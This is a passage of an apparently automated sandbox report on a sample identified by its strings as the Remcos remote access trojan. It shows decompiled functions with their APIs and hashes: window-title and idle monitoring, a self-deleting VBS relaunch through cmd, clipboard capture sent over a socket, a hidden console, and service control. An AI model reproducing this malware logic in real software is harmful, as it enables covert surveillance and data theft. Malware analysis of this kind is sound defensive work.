							Sleep(0x3e8);
						}
						E00741EF0();
						break;
					}
				}
				__eflags = 0;
				return 0;
			}

0x00749195
0x0074919b
0x0074919e
0x0074919f
0x007491a1
0x007491a3
0x00749202
0x0074920e
0x00749211
0x0074921b
0x00749223
0x0074922a
0x00749234
0x00749245
0x0074924b
0x0074925b
0x00749267
0x0074927b
0x00749280
0x00749287
0x0074928e
0x007492b8
0x007492bc
0x007492c4
0x007492cd
0x00749290
0x00749293
0x0074929a
0x0074929a
0x0074928e
0x0074925b
0x007492d2
0x007492d4
0x007492e5
0x0074938d
0x00749391
0x00000000
0x007492eb
0x007492eb
0x007492ef
0x007492ff
0x00749306
0x00749326
0x00749329
0x0074935a
0x0074935f
0x00749362
0x00749366
0x0074936d
0x00749376
0x0074937f
0x00749388
0x00000000
0x00749388
0x00749308
0x0074930f
0x00749313
0x00749313
0x0074939f
0x00000000
0x0074939f
0x007492e5
0x007493a6
0x007493ac

APIs

__Init_thread_footer.LIBCMT ref: 007491F7
Sleep.KERNEL32(000001F4), ref: 00749202
GetForegroundWindow.USER32 ref: 00749208
GetWindowTextLengthW.USER32(00000000), ref: 00749211
GetWindowTextW.USER32 ref: 00749245
Sleep.KERNEL32(000003E8), ref: 00749313

Part of subcall function 00749E69: char_traits.LIBCPMT ref: 00749E79

Part of subcall function 00748B80: SetEvent.KERNEL32(?,?,?,?,00749CFC,?,?,?,?,?,00000000), ref: 00748BAD

Strings

minutes }, xrefs: 00749339
[ , xrefs: 007492AD
], xrefs: 007492A7
{ User has been idle for , xrefs: 00749345

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Window$SleepText$EventForegroundInit_thread_footerLengthchar_traits
String ID: [ ${ User has been idle for $ ]$ minutes }
API String ID: 107669343-3343415809
Opcode ID: 44cf885aa7fc333b70f02c3254c6e23d40a49a7fd1ac3f528992739636166d6f
Instruction ID: 1baea5466234d313443e3f684630671cfac41be4afc6dd20dd09166d047d4215
Opcode Fuzzy Hash: 44cf885aa7fc333b70f02c3254c6e23d40a49a7fd1ac3f528992739636166d6f
Instruction Fuzzy Hash: 9F51E371208240ABC714FB64D88AA6FB7A5BFC5310F400A2DFA47D65D2EF6C9E46C652

Uniqueness

Uniqueness Score: -1.00%

Function 0074B488, Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 148
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0074B488(void* __ebx, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				char _v172;
				char _v196;
				short _v716;
				void* __edi;
				void* __ebp;
				void* _t36;
				void* _t37;
				void* _t40;
				void* _t54;
				void* _t67;
				void* _t68;
				void* _t79;

				_t79 = __ebx;
				E0075015B();
				_t36 = E00742489();
				_t37 = E00741F95(0x7ac560);
				_t40 = E00750A30(E00741F95(0x7ac518), "exepath",  &_v716, 0x208, _t37, _t36);
				_t140 = _t40;
				if(_t40 == 0) {
					GetModuleFileNameW(0,  &_v716, 0x208);
				}
				E007430A6(_t79,  &_v124, E007572DA( &_v52, E00757093( &_v76)), 0, _t140, L".vbs");
				E00741EF0();
				E00741FC7();
				E00744429(_t79,  &_v100, E007430A6(_t79,  &_v76, E0074427F(_t79,  &_v52, E0077987F(_t79,  &_v76, _t140, L"Temp")), 0, _t140, "\\"), _t140,  &_v124);
				E00741EF0();
				E00741EF0();
				E00741F6D(_t79,  &_v28);
				_t54 = E0074427F(_t79,  &_v196, L"\"\"\", 0");
				E00743311(E007430A6(_t79,  &_v76, E00743030( &_v52, E007430A6(_t79,  &_v148, E0074427F(_t79,  &_v172, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), 0, _t140,  &_v716), _t54), 0, _t140, "\n"));
				E00741EF0();
				E00741EF0();
				E00741EF0();
				E00741EF0();
				E00741EF0();
				E0074766C(_t79,  &_v28, 0, L"CreateObject(\"Scripting.FileSystemObject\").DeleteFile(Wscript.ScriptFullName)");
				_t67 = E00741EEB( &_v100);
				_t68 = E00742489();
				if(E00757947(E00741EEB( &_v28), _t68 + _t68, _t67, 0) != 0 && ShellExecuteW(0, L"open", E00741EEB( &_v100), 0x79f724, 0x79f724, 0) > 0x20) {
					ExitProcess(0);
				}
				E00741EF0();
				E00741EF0();
				return E00741EF0();
			}

0x0074b488
0x0074b493
0x0074b49f
0x0074b4a7
0x0074b4cb
0x0074b4d5
0x0074b4d7
0x0074b4e2
0x0074b4e2
0x0074b504
0x0074b50d
0x0074b515
0x0074b547
0x0074b550
0x0074b558
0x0074b560
0x0074b575
0x0074b5ba
0x0074b5c2
0x0074b5ca
0x0074b5d5
0x0074b5e0
0x0074b5eb
0x0074b5f8
0x0074b601
0x0074b60a
0x0074b628
0x0074b64d
0x0074b64d
0x0074b656
0x0074b65e
0x0074b670

APIs

Part of subcall function 0075015B: TerminateProcess.KERNEL32(00000000,?,0074AD95), ref: 0075016B
Part of subcall function 0075015B: WaitForSingleObject.KERNEL32(000000FF,?,0074AD95), ref: 0075017E

Part of subcall function 00750A30: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00750A4C
Part of subcall function 00750A30: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 00750A65
Part of subcall function 00750A30: RegCloseKey.ADVAPI32(00000000), ref: 00750A70

GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0074B4E2
ShellExecuteW.SHELL32(00000000,open,00000000,0079F724,0079F724,00000000), ref: 0074B641
ExitProcess.KERNEL32 ref: 0074B64D

Strings

Temp, xrefs: 0074B523
""", 0, xrefs: 0074B56A
CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName), xrefs: 0074B5F0
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0074B582
open, xrefs: 0074B63B
.vbs, xrefs: 0074B4E8
exepath, xrefs: 0074B4BA

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
API String ID: 1913171305-2411266221
Opcode ID: 3252ce8c74bea82780b547e10ce752fee7ab40b562e6a34ce909f19e2c909a3e
Instruction ID: 66677b3997cb06abb00cbd2a065e4307ff38d373dc3c7b870db01d1a386e06ef
Opcode Fuzzy Hash: 3252ce8c74bea82780b547e10ce752fee7ab40b562e6a34ce909f19e2c909a3e
Instruction Fuzzy Hash: B4417971910118EBCB14F7A4DC5ADFE777ABF61741F804129F906A3192EF285E8ACA90

Uniqueness

Uniqueness Score: -1.00%

Function 0077558A, Relevance: 16.6, APIs: 11, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0077558A(void* __edx, void* __eflags, char* _a4, int _a8, char* _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* __ebx;
				char* _t31;
				int _t35;
				int _t43;
				void* _t51;
				int _t52;
				int _t54;
				void* _t56;
				void* _t63;
				short* _t64;
				short* _t67;

				_t62 = __edx;
				E00775507(_t51,  &_v28, __edx, _a24);
				_t52 = 0;
				_t54 =  *(_v24 + 0x14);
				_t31 = _a4;
				_v8 = _t54;
				if(_t31 == 0) {
					L4:
					 *((intOrPtr*)(E0077A504())) = 0x16;
					E0077695D();
					L18:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return _t52;
				}
				_t66 = _a8;
				if(_a8 == 0) {
					goto L4;
				}
				 *_t31 = 0;
				if(_a12 == 0 || _a16 == 0) {
					goto L4;
				} else {
					_t35 = MultiByteToWideChar(_t54, 0, _a12, 0xffffffff, 0, 0);
					_v12 = _t35;
					if(_t35 != 0) {
						_t64 = E0077F98C(_t54, _t35 + _t35);
						_t56 = _t63;
						if(_t64 != 0) {
							if(MultiByteToWideChar(_v8, 0, _a12, 0xffffffff, _t64, _v12) != 0) {
								_t67 = E0077F98C(_t56, _t66 + _t66);
								if(_t67 != 0) {
									_t43 = E00781453(0, _t62, _t67, _a8, _t64, _a16, _a20, _a24);
									_v12 = _t43;
									if(_t43 != 0) {
										if(WideCharToMultiByte(_v8, 0, _t67, 0xffffffff, _a4, _a8, 0, 0) != 0) {
											_t52 = _v12;
										} else {
											E0077A4CE(GetLastError());
										}
									}
								}
								E007801F5(_t67);
							} else {
								E0077A4CE(GetLastError());
							}
						}
						E007801F5(_t64);
					} else {
						E0077A4CE(GetLastError());
					}
					goto L18;
				}
			}

0x0077558a
0x0077559a
0x007755a2
0x007755a4
0x007755a7
0x007755aa
0x007755af
0x007755c4
0x007755c9
0x007755cf
0x007756a1
0x007756a5
0x007756aa
0x007756aa
0x007756b8
0x007756b8
0x007755b1
0x007755b6
0x00000000
0x00000000
0x007755b8
0x007755bd
0x00000000
0x007755d9
0x007755e2
0x007755e8
0x007755ed
0x0077560a
0x0077560c
0x0077560f
0x0077562a
0x00775643
0x00775648
0x00775658
0x00775660
0x00775665
0x0077567e
0x0077568f
0x00775680
0x00775687
0x0077568c
0x0077567e
0x00775665
0x00775693
0x0077562c
0x00775633
0x00775633
0x00775698
0x0077569a
0x007755ef
0x007755f6
0x007755fb
0x00000000
0x007755ed

APIs

MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00741D39,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 007755E2
GetLastError.KERNEL32(?,?,00741D39,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 007755EF
__dosmaperr.LIBCMT ref: 007755F6
MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00741D39,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00775622
GetLastError.KERNEL32(?,?,?,00741D39,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0077562C
__dosmaperr.LIBCMT ref: 00775633
WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00741D39,?), ref: 00775676
GetLastError.KERNEL32(?,?,?,?,?,?,00741D39,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00775680
__dosmaperr.LIBCMT ref: 00775687
_free.LIBCMT ref: 00775693
_free.LIBCMT ref: 0077569A

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
String ID:
API String ID: 2441525078-0
Opcode ID: 83e8bc9a546910f608c8ee27c86bb48e763528b50b1053e41a9a97e8d0bb01b6
Instruction ID: f43593e09804b71c7b8cc12a6bfe1468eb91dccd7f0e6fca4bdf9b743bdd3093
Opcode Fuzzy Hash: 83e8bc9a546910f608c8ee27c86bb48e763528b50b1053e41a9a97e8d0bb01b6
Instruction Fuzzy Hash: 1E31BF7280064AFFDF11AFA4CC49CAF7B79AF047A0B10C159F91896190DB79CD21DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 007453ED, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155
windowmemoryCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E007453ED(char* __edx, void* __eflags, intOrPtr _a4) {
				struct tagMSG _v52;
				void* _v56;
				char _v60;
				char _v76;
				char _v80;
				char _v84;
				char _v104;
				char _v108;
				void* _v112;
				char _v116;
				char _v120;
				char _v140;
				void* _v176;
				void* __ebx;
				void* __ebp;
				intOrPtr* _t28;
				char* _t36;
				intOrPtr _t45;
				intOrPtr _t46;
				void* _t57;
				intOrPtr _t69;
				void* _t111;
				void* _t113;
				void* _t115;
				signed int _t117;
				void* _t120;
				void* _t121;
				void* _t122;
				void* _t123;

				_t125 = __eflags;
				_t101 = __edx;
				_t69 = _a4;
				E007420EC(_t69,  &_v104, __edx, __eflags, _t69 + 0x1c);
				SetEvent( *(_t69 + 0x34));
				_t28 = E00741F95( &_v108);
				E007442A6( &_v108,  &_v60, 4, 0xffffffff);
				_t120 = (_t117 & 0xfffffff8) - 0x5c;
				E007420EC(_t69, _t120, _t101, _t125, 0x7ac238);
				_t121 = _t120 - 0x18;
				E007420EC(_t69, _t121, _t101, _t125,  &_v76);
				E00757478( &_v140, _t101);
				_t122 = _t121 + 0x30;
				_t111 =  *_t28 - 0x3a;
				if(_t111 == 0) {
					E00741E49( &_v116, _t101, __eflags, 0);
					_t36 = E00742489();
					E00741F95(E00741E49( &_v120, _t101, __eflags, 0));
					_t101 = _t36;
					_t113 = E0074F69B();
					__eflags = _t113;
					if(_t113 == 0) {
						L7:
						E00741E74( &_v116, _t101);
						E00741FC7();
						E00741FC7();
						__eflags = 0;
						return 0;
					}
					 *0x7abaec = E0074F931(_t113, "DisplayMessage");
					_t45 = E0074F931(_t113, "GetMessage");
					_t104 = "CloseChat";
					 *0x7abae4 = _t45;
					_t46 = E0074F931(_t113, "CloseChat");
					_t123 = _t122 - 0x18;
					 *0x7abae8 = _t46;
					 *0x7abae1 = 1;
					E007420EC(_t69, _t123, "CloseChat", __eflags, 0x7ac2b8);
					_push(0x74);
					E00744AA4(_t69, _t69, _t104, __eflags);
					L10:
					_t115 = HeapCreate(0, 0, 0);
					__eflags =  *0x7abae4(_t115,  &_v140);
					if(__eflags != 0) {
						_t123 = _t123 - 0x18;
						E007420AB(_t69, _t123, _t104, __eflags, _v140, _t51);
						_push(0x3b);
						E00744AA4(_t69, _t69, _t104, __eflags);
						HeapFree(_t115, 0, _v176);
					}
					goto L10;
				}
				_t127 = _t111 != 1;
				if(_t111 != 1) {
					goto L7;
				}
				_t57 =  *0x7abaec(E00741F95(E00741E49( &_v116, _t101, _t127, 0)));
				_t128 = _t57;
				if(_t57 == 0) {
					goto L7;
				}
				E0074427F(_t69,  &_v80, 0x79f6b8);
				_t101 =  &_v84;
				E0075739C(_t69, _t122 - 0x18,  &_v84);
				_push(0x3b);
				E00744AA4(_t69, _t69,  &_v84, _t128);
				E00741EF0();
				L4:
				while(GetMessageA( &_v52, 0, 0, 0) > 0) {
					TranslateMessage( &_v52);
					DispatchMessageA( &_v52);
				}
				if(__eflags < 0) {
					goto L4;
				}
				goto L7;
			}

0x007453ed
0x007453ed
0x007453fb
0x00745404
0x0074540c
0x00745416
0x0074542a
0x0074542f
0x00745439
0x0074543e
0x00745448
0x00745451
0x00745456
0x00745459
0x0074545c
0x0074550b
0x00745512
0x00745525
0x0074552a
0x00745533
0x00745535
0x00745537
0x007454e0
0x007454e4
0x007454ed
0x007454f6
0x007454fd
0x00745503
0x00745503
0x0074554a
0x00745551
0x00745556
0x0074555b
0x00745562
0x00745567
0x0074556a
0x00745571
0x0074557d
0x00745582
0x00745586
0x0074558b
0x00745594
0x007455a4
0x007455a6
0x007455a8
0x007455b2
0x007455b7
0x007455bb
0x007455c6
0x007455c6
0x00000000
0x007455a6
0x00745462
0x00745465
0x00000000
0x00000000
0x0074547b
0x00745482
0x00745484
0x00000000
0x00000000
0x0074548f
0x00745497
0x0074549d
0x007454a2
0x007454a6
0x007454af
0x00000000
0x007454b4
0x007454cb
0x007454d6
0x007454d6
0x007454de
0x00000000
0x00000000
0x00000000

APIs

SetEvent.KERNEL32(?,?), ref: 0074540C
GetMessageA.USER32 ref: 007454BC
TranslateMessage.USER32(?), ref: 007454CB
DispatchMessageA.USER32 ref: 007454D6
HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,007AC2B8), ref: 0074558E
HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 007455C6

Part of subcall function 00744AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00744B18

Strings

GetMessage, xrefs: 00745545
DisplayMessage, xrefs: 00745539
CloseChat, xrefs: 00745556

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
String ID: CloseChat$DisplayMessage$GetMessage
API String ID: 2956720200-749203953
Opcode ID: f4aa6ec60cf0a7050440c713b6573a011b688568a1717dd495a66b3f994fba05
Instruction ID: df117e2f1a63be28868efb29cd52f71b97d6ed272484b473b32bf425609d30ac
Opcode Fuzzy Hash: f4aa6ec60cf0a7050440c713b6573a011b688568a1717dd495a66b3f994fba05
Instruction Fuzzy Hash: 3341A371604310EBCB14FB74DC4E96F7BA9AF86710B80492DF911975A2EF3C9A0AC791

Uniqueness

Uniqueness Score: -1.00%

Function 0075805B, Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 134
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E0075805B(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v524;
				char _v544;
				char _v560;
				char _v572;
				void* _v576;
				char _v580;
				char _v584;
				char _v600;
				char _v608;
				char _v616;
				char _v620;
				void* _v624;
				char _v628;
				char _v632;
				char _v636;
				char _v644;
				void* _v648;
				char _v652;
				void* _v672;
				void* __ebx;
				signed int _t36;
				void* _t39;
				void* _t40;
				void* _t77;

				_t73 = __edx;
				_t77 = __ecx;
				_t54 = __edx;
				E00741F6D(__edx,  &_v644);
				_t36 = __edx + 0xffffffd0;
				_t85 = _t36 - 7;
				if(_t36 <= 7) {
					switch( *((intOrPtr*)(_t36 * 4 +  &M00758237))) {
						case 0:
							_push(L"Temp");
							goto L14;
						case 1:
							__ecx =  &_v620;
							__eax = E00756D45(__ebx,  &_v620);
							__ecx =  &_v644;
							__eax = E00741EFA( &_v644, __edx, __esi, __eax);
							goto L4;
						case 2:
							_push(L"SystemDrive");
							goto L14;
						case 3:
							_push(L"WinDir");
							goto L14;
						case 4:
							__eax = E00757614(__ecx);
							__eflags = __al;
							if(__eflags != 0) {
								__ecx =  &_v620;
								E0074427F(__ebx, __ecx, L"\\SysWOW64") = E0077987F(__ebx, __ecx, __eflags, L"WinDir");
								__ecx =  &_v600;
								__edx = __eax;
								__ecx =  &_v580;
								__eax = E00743030( &_v580, __edx, __eax);
								__ecx =  &_v652;
								__eax = E00741EFA( &_v652, __edx, __esi, __eax);
								__ecx =  &_v584;
								__eax = E00741EF0();
								__ecx =  &_v608;
								__eax = E00741EF0();
								L4:
								__ecx =  &_v620;
								goto L5;
							} else {
								__ecx =  &_v572;
								E0074427F(__ebx, __ecx, L"\\system32") = E0077987F(__ebx, __ecx, __eflags, L"WinDir");
								__ecx =  &_v600;
								__edx = __eax;
								__ecx =  &_v628;
								__eax = E00743030( &_v628, __edx, __eax);
								__ecx =  &_v652;
								__eax = E00741EFA( &_v652, __edx, __esi, __eax);
								__ecx =  &_v632;
								__eax = E00741EF0();
								__ecx =  &_v608;
								__eax = E00741EF0();
								__ecx =  &_v584;
								L5:
								__eax = E00741EF0();
								goto L15;
							}
							L16:
						case 5:
							_push(L"ProgramFiles");
							goto L14;
						case 6:
							_push(L"AppData");
							goto L14;
						case 7:
							_push(L"UserProfile");
							L14:
							E00749DC9(_t54,  &_v644, E0077987F(_t54, _t57, _t85));
							goto L15;
					}
				}
				L15:
				__imp__GetLongPathNameW(E00741EEB( &_v644),  &_v524, 0x208);
				_t39 = E0074427F(_t54,  &_v560, _a4);
				_t40 = E0074427F(_t54,  &_v636, "\\");
				E00743030(_t77, E00743030( &_v600, E007583F4(_t54,  &_v616, _t73, _t85,  &_v544, _t38), _t40), _t39);
				E00741EF0();
				E00741EF0();
				E00741EF0();
				E00741EF0();
				E00741EF0();
				return _t77;
				goto L16;
			}

0x0075805b
0x0075806a
0x0075806c
0x00758072
0x0075807a
0x0075807d
0x00758080
0x00758086
0x00000000
0x0075808d
0x00000000
0x00000000
0x00758097
0x0075809b
0x007580a1
0x007580a5
0x00000000
0x00000000
0x007580b8
0x00000000
0x00000000
0x007580c2
0x00000000
0x00000000
0x007580cc
0x007580d1
0x007580d3
0x0075812c
0x0075813b
0x00758142
0x0075814b
0x0075814d
0x00758151
0x00758158
0x0075815c
0x00758161
0x00758165
0x0075816a
0x0075816e
0x007580aa
0x007580aa
0x00000000
0x007580d5
0x007580da
0x007580e9
0x007580f0
0x007580f9
0x007580fb
0x007580ff
0x00758106
0x0075810a
0x0075810f
0x00758113
0x00758118
0x0075811c
0x00758121
0x007580ae
0x007580ae
0x00000000
0x007580ae
0x00000000
0x00000000
0x00758178
0x00000000
0x00000000
0x0075817f
0x00000000
0x00000000
0x00758186
0x0075818b
0x00758196
0x00000000
0x00000000
0x00758086
0x0075819b
0x007581b2
0x007581c1
0x007581d0
0x007581f8
0x00758202
0x0075820b
0x00758214
0x0075821d
0x00758226
0x00758233
0x00000000

APIs

GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 007581B2

Strings

Temp, xrefs: 0075808D
UserProfile, xrefs: 00758186
SystemDrive, xrefs: 007580B8
ProgramFiles, xrefs: 00758178
\system32, xrefs: 007580D5
AppData, xrefs: 0075817F
\SysWOW64, xrefs: 00758127
WinDir, xrefs: 007580C2, 007580E4, 00758136

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: LongNamePath
String ID: AppData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
API String ID: 82841172-1609423294
Opcode ID: 98c614025c90c7fc443099da338e4ade26b57fa8b3865efdd20b9ac9adee37cc
Instruction ID: 806f327bef95d3f43fb6b30b7f51b03a5efe6d2eb7c40b5705167f87a0742027
Opcode Fuzzy Hash: 98c614025c90c7fc443099da338e4ade26b57fa8b3865efdd20b9ac9adee37cc
Instruction Fuzzy Hash: 07418871108240EBD604F760DC5A8FF73A9BEA1751F900A2DFD46520E1EFAC9A4EC663

Uniqueness

Uniqueness Score: -1.00%

Function 00758F59, Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 89
memoryCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00758F59(void* __ebx, void* __ecx, void* __edx) {
				char _v204;
				void* __edi;
				struct HWND__* _t17;
				void _t22;
				intOrPtr _t24;
				intOrPtr _t25;
				void _t26;
				void _t28;
				void* _t30;
				void* _t34;
				signed int _t37;
				void* _t45;
				void* _t47;
				void* _t51;
				void* _t53;
				void* _t55;
				void* _t59;

				_t36 = __ecx;
				_t34 = __ecx;
				AllocConsole();
				_t17 =  *0x7aca84(__ebx);
				 *0x7abebc = _t17;
				if(_t34 == 0) {
					ShowWindow(_t17, 0);
				}
				_push(_t45);
				E0077BCA5(_t36, "CONOUT$", "a", E00776A85(1));
				E00771F00(_t45,  &_v204, 0, 0xc8);
				_t47 =  &_v204 - 1;
				do {
					_t22 =  *(_t47 + 1);
					_t47 = _t47 + 1;
				} while (_t22 != 0);
				_t37 = 7;
				memcpy(_t47, "--------------------------\n", _t37 << 2);
				_t51 =  &_v204 - 1;
				do {
					_t24 =  *((intOrPtr*)(_t51 + 1));
					_t51 = _t51 + 1;
				} while (_t24 != 0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t53 =  &_v204 - 1;
				do {
					_t25 =  *((intOrPtr*)(_t53 + 1));
					_t53 = _t53 + 1;
				} while (_t25 != 0);
				asm("movsd");
				asm("movsd");
				asm("movsw");
				_t55 =  &_v204 - 1;
				do {
					_t26 =  *(_t55 + 1);
					_t55 = _t55 + 1;
				} while (_t26 != 0);
				_push(6);
				memcpy(_t55, "\n * BreakingSecurity.net\n", 0 << 2);
				asm("movsw");
				_t59 =  &_v204 - 1;
				do {
					_t28 =  *(_t59 + 1);
					_t59 = _t59 + 1;
					_t85 = _t28;
				} while (_t28 != 0);
				_t30 = memcpy(_t59, "--------------------------\n\n", 0 << 2);
				asm("movsb");
				return E0074482E(_t85, _t30, 7);
			}

0x00758f59
0x00758f63
0x00758f65
0x00758f6b
0x00758f73
0x00758f79
0x00758f7e
0x00758f7e
0x00758f85
0x00758f98
0x00758fab
0x00758fb9
0x00758fba
0x00758fba
0x00758fbd
0x00758fbe
0x00758fc4
0x00758fca
0x00758fd2
0x00758fd3
0x00758fd3
0x00758fd6
0x00758fd7
0x00758fe0
0x00758fe1
0x00758fe2
0x00758fe9
0x00758fea
0x00758fea
0x00758fed
0x00758fee
0x00758ff7
0x00758ff8
0x00758ff9
0x00759001
0x00759002
0x00759002
0x00759005
0x00759006
0x0075900a
0x00759012
0x00759014
0x0075901c
0x0075901d
0x0075901d
0x00759020
0x00759021
0x00759021
0x00759033
0x00759036
0x00759042

APIs

AllocConsole.KERNEL32(00000001), ref: 00758F65
GetConsoleWindow.KERNEL32 ref: 00758F6B
ShowWindow.USER32(00000000,00000000), ref: 00758F7E

Strings

--------------------------, xrefs: 00758FC5
* BreakingSecurity.net, xrefs: 0075900D
CONOUT$, xrefs: 00758F93
* Remcos v, xrefs: 00758FDB
3.2.1 Pro, xrefs: 00758FF2
--------------------------, xrefs: 00759028

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ConsoleWindow$AllocShow
String ID: * BreakingSecurity.net$ * Remcos v$--------------------------$--------------------------$3.2.1 Pro$CONOUT$
API String ID: 3461962499-1433448479
Opcode ID: 89476c64cffe448917f1c7e56cdc3a6ccbae30f81b9509b020e571c75b1ad6cf
Instruction ID: 3af1c489d707b73685798dc6c40d9ed80238ea921f5db16d3f23c821326c170f
Opcode Fuzzy Hash: 89476c64cffe448917f1c7e56cdc3a6ccbae30f81b9509b020e571c75b1ad6cf
Instruction Fuzzy Hash: A7212B32908A056AEF619F145C05FD5B75AAF93710F408791ED4C7B181CBEA2D8A47B4

Uniqueness

Uniqueness Score: -1.00%

Function 00752D6D, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 49
clipboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00752D6D(void* __ebp, char _a16, char _a32, char _a36, void* _a128, void* _a152) {
				void* __ebx;
				void* _t16;
				struct HWND__* _t23;
				void* _t38;
				void* _t41;

				if(OpenClipboard(_t23) != 0) {
					EmptyClipboard();
					CloseClipboard();
					if(OpenClipboard(_t23) != 0) {
						_t38 = GetClipboardData(0xd);
						_t16 = GlobalLock(_t38);
						GlobalUnlock(_t38);
						CloseClipboard();
						_t29 =  !=  ? _t16 : 0x79f724;
						E0074427F(_t23,  &_a36,  !=  ? _t16 : 0x79f724);
						_t34 =  &_a32;
						E0075739C(_t23, _t41 - 0x18,  &_a32);
						_push(0x6b);
						E00744AA4(_t23, 0x7ac780,  &_a32, _t16);
						E00741EF0();
					}
				}
				_t4 =  &_a16; // 0x744538
				E00741E74(_t4, _t34);
				E00741FC7();
				E00741FC7();
				return 0;
			}

0x00752d76
0x00752d7c
0x00752d82
0x00752d91
0x00752d9f
0x00752da2
0x00752dab
0x00752db1
0x00752dbe
0x00752dc6
0x00752dce
0x00752dd4
0x00752dd9
0x00752de0
0x0075318d
0x0075318d
0x00752d91
0x007533c4
0x007533c8
0x007533d4
0x007533e0
0x007533ed

APIs

OpenClipboard.USER32 ref: 00752D6E
EmptyClipboard.USER32 ref: 00752D7C
CloseClipboard.USER32 ref: 00752D82
OpenClipboard.USER32 ref: 00752D89
GetClipboardData.USER32 ref: 00752D99
GlobalLock.KERNEL32 ref: 00752DA2
GlobalUnlock.KERNEL32(00000000), ref: 00752DAB
CloseClipboard.USER32 ref: 00752DB1

Part of subcall function 00744AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00744B18

Strings

8Et, xrefs: 007533C4

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
String ID: 8Et
API String ID: 2172192267-257909599
Opcode ID: 6c292a4a321165ca2df9863e246caabad48da9c627e6933c3d19ccea4f5d3496
Instruction ID: 44e13c104b14071912ddf07a66b65c65a2c7c1ed9867f43eb8593863526c6ccc
Opcode Fuzzy Hash: 6c292a4a321165ca2df9863e246caabad48da9c627e6933c3d19ccea4f5d3496
Instruction Fuzzy Hash: 6C015231244600DFC304BB71DC4EAAEB7A5BF95342F40492EF916C51B1DF7C8A4AC655

Uniqueness

Uniqueness Score: -1.00%

Function 00756472, Relevance: 15.1, APIs: 10, Instructions: 66
serviceCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00756472(char _a4) {
				intOrPtr _v28;
				struct _SERVICE_STATUS _v32;
				int _t22;
				void* _t26;
				void* _t27;

				_t22 = 0;
				_t27 = OpenSCManagerW(0, 0, 0x11);
				_t26 = OpenServiceW(_t27, E00741EEB( &_a4), 0xf003f);
				if(_t26 != 0) {
					if(ControlService(_t26, 1,  &_v32) != 0) {
						do {
							QueryServiceStatus(_t26,  &_v32);
						} while (_v28 != 1);
